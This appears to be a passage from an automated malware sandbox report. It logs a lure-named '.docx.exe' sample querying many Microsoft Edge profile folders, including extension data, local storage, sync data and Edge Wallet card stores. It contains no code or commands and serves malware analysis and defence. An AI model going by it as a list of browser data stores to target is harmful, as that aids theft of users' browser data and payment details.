Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentWorkspacesV2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5959.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformation	Jump to behavior
